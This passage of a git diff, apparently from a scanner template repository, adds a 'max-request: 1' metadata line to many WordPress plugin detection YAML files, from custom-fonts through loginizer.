b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ 